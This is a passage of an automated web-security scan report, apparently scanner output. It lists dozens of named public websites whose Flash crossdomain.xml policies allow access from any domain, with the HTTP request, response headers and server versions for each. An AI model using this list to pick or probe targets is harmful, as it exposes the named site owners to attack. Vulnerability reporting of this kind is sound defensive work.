The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.plaindealer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 20 Jan 2009 20:47:52 GMT
ETag: "bdd09c-14d-460f027250e00"
Accept-Ranges: bytes
Content-Length: 333
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.150. http://www.playingforchange.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.playingforchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playingforchange.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:25:14 GMT
Server: Apache/2.2.15 (EL)
Last-Modified: Tue, 31 Aug 2010 23:27:14 GMT
ETag: "56c61b-e6-48f26ebc61880"
Accept-Ranges: bytes
Content-Length: 230
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...

7.151. http://www.playmymovs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.playmymovs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.playmymovs.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:30:36 GMT
Content-Type: text/xml
Content-Length: 141
Last-Modified: Sat, 23 Apr 2011 10:40:45 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>

7.152. http://www.porkolt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.porkolt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.porkolt.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:45 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.25
Last-Modified: Tue, 13 Feb 2007 02:24:16 GMT
ETag: "100f3dab-cb-528ef400"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>


<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.153. http://www.pqdvd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pqdvd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pqdvd.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:55:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5
Last-Modified: Wed, 21 Nov 2007 09:02:55 GMT
ETag: "29e8cc3-cd-a5a64dc0"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.154. http://www.providenceiscalling.jobs/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.providenceiscalling.jobs
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.providenceiscalling.jobs

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 24 Apr 2009 20:39:46 GMT
Accept-Ranges: bytes
ETag: "18feece1cc5c91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:49:52 GMT
Connection: close
Content-Length: 333

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.155. http://www.pushplay.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pushplay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pushplay.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:09:24 GMT
Server: Apache
Last-Modified: Tue, 30 Mar 2010 19:55:43 GMT
ETag: "3530009-cb-4830a03c50dc0"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.156. http://www.qualcomm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.qualcomm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.qualcomm.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 15 Nov 2010 17:02:03 GMT
ETag: "1d4-6630b8c0"
Content-Type: text/xml
Date: Wed, 04 May 2011 02:15:10 GMT
Content-Length: 468
Connection: close

<?xml version="1.0" encoding="UTF-8"?><!-- This file is allows SWFs requesting data from a domain different from that which the SWF was serverd form to access data. It needs to reside at the root le
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.157. http://www.quickbuyme.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.quickbuyme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.quickbuyme.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:05:45 GMT
Server: Apache/2.2.4 (Fedora)
Vary: Host
Last-Modified: Tue, 05 Jan 2010 01:09:47 GMT
ETag: "1bb1326-8d-7e72ccc0"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

7.158. http://www.rebubbled.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rebubbled.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rebubbled.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:53 GMT
Server: Apache
Last-Modified: Thu, 23 Dec 2010 13:48:33 GMT
ETag: "18ed0d7-c3-4981420266e40"
Accept-Ranges: bytes
Content-Length: 195
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

7.159. http://www.rewardscart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rewardscart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.rewardscart.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:23:51 GMT
Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6
PHP/5.2.4
Last-Modified: Thu, 06 May 2010 01:42:30 GMT
ETag: "620e18-153-485e30e402d80"
Accept-Ranges: bytes
Content-Length: 339
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.160. http://www.secretbuilders.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.secretbuilders.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.secretbuilders.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:16:40 GMT
Server: Apache/2.2.17 (Fedora)
Last-Modified: Tue, 19 Apr 2011 11:48:24 GMT
ETag: "75-4a14415f21c0b"
Accept-Ranges: bytes
Content-Length: 117
Vary: Accept-Encoding
P3P: CP="CAO PSA OUR"
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

7.161. http://www.segodnya.ua/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.segodnya.ua
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.segodnya.ua

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 04 May 2011 01:21:30 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 198
Last-Modified: Mon, 19 Oct 2009 08:53:51 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.162. http://www.sharethatboy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sharethatboy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sharethatboy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 04 Jul 2010 06:42:22 GMT
ETag: "71d02ac-138-48a8a1f4b6f80"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.163. http://www.sheezyart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sheezyart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sheezyart.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "3251366860"
Last-Modified: Mon, 02 Feb 2009 23:36:01 GMT
Content-Length: 338
Connection: close
Date: Wed, 04 May 2011 03:27:15 GMT
Server: lighttpd/1.4.26

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.164. http://www.simply.tv/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.simply.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.simply.tv

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:06 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Sep 2008 08:37:42 GMT
ETag: "d70002-d2-32974180"
Accept-Ranges: bytes
Content-Length: 210
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:21:06 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domai
...[SNIP]...

7.165. http://www.sonicretro.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonicretro.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sonicretro.org

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 04:10:12 GMT
Server: Apache/2.2.9 (Debian) DAV/2 SVN/1.5.1 mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 04 May 2011 04:10:12 GMT
Vary: Cookie,Accept-Encoding
Content-Length: 493
Connection: close
Content-Type: text/xml; charset=UTF-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

7.166. http://www.sonicstate.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sonicstate.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sonicstate.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:30:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 11 Jun 2010 11:38:08 GMT
ETag: "c8769-cb-92b04800"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.167. http://www.sparechangeinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sparechangeinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sparechangeinc.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:11:44 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Sun, 06 Sep 2009 21:41:58 GMT
Accept-Ranges: bytes
Content-Length: 545
Vary: Accept-Encoding
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 03:11:44 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.sparechangeinc.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...

7.168. http://www.sparkworkz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sparkworkz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sparkworkz.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:25:42 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "100-4b180ac9-0"
Last-Modified: Thu, 03 Dec 2009 19:00:25 GMT
Content-Type: application/xml
Content-Length: 256
Cache-Control: max-age=172800, proxy-revalidate

<?xml version="1.0" encoding="utf-8"?>

<cross-domain-policy>

<site-control permitted-cross-domain-policies="master-only"/>

<allow-access-from domain="*"/>

<allow-http-request-headers
...[SNIP]...

7.169. http://www.staralliance.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.staralliance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.staralliance.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:47:50 GMT
Server: Apache/2.2.15 (Unix) mod_jk2/2.0.4 mod_jk/1.2.30 PHP/5.3.3
Last-Modified: Mon, 20 Dec 2010 11:32:33 GMT
Accept-Ranges: bytes
Content-Type: application/xml
Content-Length: 215
ExtraHdr: 33102-ag-ED8281ECFC140-0- f
Via: 1.0 www.staralliance.com (Access Gateway 3.1.2-IR2663621-ED8281ECFC140733)
Set-Cookie: ZNPCQ003-32383800=5fd7b06d; path=/; domain=.staralliance.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross
...[SNIP]...

7.170. http://www.superrewards-offers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superrewards-offers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.superrewards-offers.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:16 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8h PHP/5.2.11
Last-Modified: Tue, 27 Oct 2009 22:20:14 GMT
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.171. http://www.talkshoe.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.talkshoe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.talkshoe.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:38:44 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_jk/1.2.28 PHP/5.2.10
Last-Modified: Mon, 08 Oct 2007 18:50:16 GMT
ETag: "1c31eaa-ca-43bffb928ca00"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.172. http://www.teamintraining.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teamintraining.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.teamintraining.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:08:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=C4517A6774D08347D01C2050270E4006.msprod-server1; Path=/
ETag: W/"201-1303483412000"
Last-Modified: Fri, 22 Apr 2011 14:43:32 GMT
Content-Length: 201
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.173. http://www.teenhollywood.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teenhollywood.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.teenhollywood.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:46:54 GMT
Server: Apache
Last-Modified: Thu, 10 Sep 2009 17:29:06 GMT
ETag: "81b0bfe-cf-4733c89531c80"
Accept-Ranges: bytes
Content-Length: 207
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.174. http://www.terabitz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.terabitz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.terabitz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:22:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d PHP/5.2.1 mod_apreq2-20051231/2.5.7 mod_perl/2.0.2 Perl/v5.8.7
Last-Modified: Mon, 31 Mar 2008 11:19:05 GMT
ETag: "136-d1d4bc40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 310
Connection: close
Via: 1.1 AN-0016020122545304

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!--This file is required for our flash websites-->
<!--Nitin-->
<!--Testing co
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.175. http://www.the-leader.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.the-leader.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.the-leader.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:53:43 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 404
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache2.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache2.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.176. http://www.thefirstpost.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefirstpost.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefirstpost.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:51 GMT
Server: Apache
Last-Modified: Fri, 02 Oct 2009 11:56:02 GMT
ETag: "cd-474f272b1b880"
Accept-Ranges: bytes
Content-Length: 205
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.177. http://www.tinierme.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tinierme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tinierme.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:50 GMT
Server: Apache
Set-Cookie: Apache=173.193.214.243.1304474390207217; path=/; domain=.tinierme.com
Last-Modified: Tue, 02 Nov 2010 06:07:29 GMT
Accept-Ranges: bytes
Content-Length: 534
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP COR ADM DEV OUR STP"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
